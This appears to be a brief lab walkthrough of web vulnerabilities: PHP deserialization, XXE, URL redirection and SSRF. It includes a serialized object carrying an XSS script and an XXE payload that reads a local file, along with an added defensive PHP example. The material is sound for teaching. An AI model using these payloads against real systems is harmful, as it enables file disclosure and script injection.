PHP deserialization
Serialization: serialize() turns an object into a string so that it can be stored or transferred, for example the object below.
Deserialization: unserialize() restores that string back into an object, which the following code then keeps using.
Submit the following serialized string as input:
O:1:"S":1:{s:4:"test";s:29:"<script>alert('aaa')</script>";}
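As an added example (not code from the original post), here is a minimal class S with a single property test, matching the serialized string above, restored with unserialize() restricted to that class and displayed with the output escaped. The variable names and the class body are assumptions; the post does not show the application's own code.

```php
<?php
// Added example: minimal class matching the serialized string in the post.
// The class body and variable names are assumptions, not the post's code.
class S {
    public $test = '';
}

// The serialized string from the post, treated as untrusted input
// (in a real application it would arrive in a request parameter).
$input = 'O:1:"S":1:{s:4:"test";s:29:"<script>alert(\'aaa\')</script>";}';

// Restrict which classes unserialize() may instantiate (PHP >= 7.0).
// Any other class name in the string yields __PHP_Incomplete_Class instead
// of an object whose magic methods (__wakeup, __destruct) would run.
$obj = unserialize($input, ['allowed_classes' => ['S']]);

if (!($obj instanceof S)) {
    exit("refused: unexpected serialized data\n");
}

// Unsafe: echoing the property as-is sends the <script> tag to the browser.
// echo $obj->test;

// Safe: escape before output, so the stored markup is shown, not executed.
echo htmlspecialchars($obj->test, ENT_QUOTES, 'UTF-8'), "\n";
```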
XXE vulnerability
XXE stands for "XML external entity injection", that is, an XML external entity injection vulnerability.
Submit normal data:
<?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY hacker "ma"> ]> <name>&hacker;</name>
Submit malicious data, where the entity points to a local file:
<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///C://pig.txt"> ]> <x>&f;</x>
URL redirection
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331150056912-210569611.png)
The URL parameter is replaced with another address, and the page redirects there.
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331150117475-1590811478.png)
SSRF (curl)
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331150156997-1650587159.png)
The URL parameter is the problem: changing the address directly makes the server fetch it.
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331150225472-366074439.png)
file_get_contents
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331150307660-107829911.png)
Almost the same as above: just change the path directly.
![](https://img2020.cnblogs.com/blog/1835640/202003/1835640-20200331150324275-256981333.png)